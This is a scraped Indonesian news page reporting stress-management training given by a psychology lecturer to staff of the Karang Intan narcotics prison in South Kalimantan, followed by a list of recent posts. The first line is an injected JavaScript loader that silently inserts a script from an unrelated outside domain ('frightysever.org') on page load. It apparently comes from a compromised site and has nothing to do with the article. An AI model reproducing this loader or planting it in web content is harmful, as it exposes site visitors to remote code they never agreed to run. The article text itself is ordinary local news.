(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Petugas Lapas Narkotika Dapat Pembekalan Management Anti Stres Saat Bertugas


KANALKALIMANTAN.COM, MARTAPURA- Dosen Psikologi Universitas Muhammadiyah Banjarmasin Akhmad Rifandi berikan materi terkait stres kerja bagi petugas Lapas Narkotika Karang Intan, di Aula Lapas, Jumat (23/9/2022).

“Kemarin kita kedatangan dosen psikologi Universitas Muhammadiyah, beri psikoedukasi petugas mengenai stres. Bekerja di Lapas mengurus banyak warga binaan, rentan stres, jadi kegiatan tersebut sedikit banyak berguna bagi pelaksanaan tugas yang dilakukan,” ungkap Kalapas Wahyu Susetyo, Sabtu (24/9/2022) pagi.

Lebih lanjut Kalapas mengungkapkan, kegiatan ini sekaligus menandai berakhirnya kegiatan magang yang dilakukan dua mahasiswa psikologi UM Banjarmasin di Lapas Narkotika Karang Intan.

Akhmad Rifandi menyampaikan, stres di tempat kerja bisa dipicu berbagai hal menyangkut pekerjaan. Perlu tindakan agar tahapan stres tidak semakin tinggi yang bisa mengarah kepada tindakan yang lebih parah.

 

 

Baca juga: 140 Anak di Banjarmasin Mengidap Kanker, Begini Anjuran Dinkes

“Stres di tempat kerja bisa terjadi disebabkan berbagai hal yang berhubungan dengan pekerjaan, stres tidak selalu buruk, ada juga stres yang disebabkan hal positif, misalnya ketika kita dapat promosi jabatan, maka juga akan menggalami stres,” jelasnya.

Dikatakan, menghadapi stres perlu coping stres, harus mampu menyesuaikan diri terhadap stres dengan kegiatan yang bisa dilakukan, selain beristirahat (tidur) juga lakukan kegiatan lainnya yang bisa meredakan stres tersebut.

”Dan itu diri sendiri yang mengetahui, misal ada orang stres karena belum minum kopi yang merupakan kesukanya, setelah itu stresnya hilang ketika sudah minum, dan sebagainya,” ujarnya.

Kegiatan ditutup dengan berfoto bersama dan diserahkan plakat dari UM Banjarmasin kepada Lapas Narkotika Karang Intan.(Kanalkalimantan.com/kk)

Reporter: kk
Editor: cell


Risa

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

11 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

13 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

13 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

14 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

18 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

21 jam ago

This website uses cookies.